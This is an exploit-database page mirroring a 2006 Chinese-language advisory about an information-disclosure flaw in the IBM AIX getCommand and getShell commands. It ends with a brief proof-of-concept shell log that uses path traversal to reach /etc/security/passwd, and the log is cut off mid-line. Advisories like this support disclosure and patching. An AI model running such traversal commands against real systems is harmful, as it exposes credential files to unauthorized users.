http://www.ers.ibm.com/<...">AIX getCommand和getShell命令信息泄露漏洞 - exploit database | Vulners.comhttp://www.ers.ibm.com/<...">http://www.ers.ibm.com/<...">http://www.ers.ibm.com/<...">
Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:484
HistoryNov 10, 2006 - 12:00 a.m.

AIX getCommand和getShell命令信息泄露漏洞

2006-11-1000:00:00
Root
www.seebug.org
12
JSON

IBM AIX是一款商业性质的UNIX操作系统。

在应用了最新补丁之后,AIX的getCommand和getShell命令中仍存在两个漏洞。攻击者可以通过特制命令判断是否存在某文件,或读取其没有权限的任意shell文档。

IBM AIX 5.3 ml03
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=“http://www.ers.ibm.com/” target=“_blank”>http://www.ers.ibm.com/</a>


                                                -bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
fopen:  No such file or directory
-bash-3.00$ ls -ld /etc/security/
drwxr-x--- 4 root s
JSON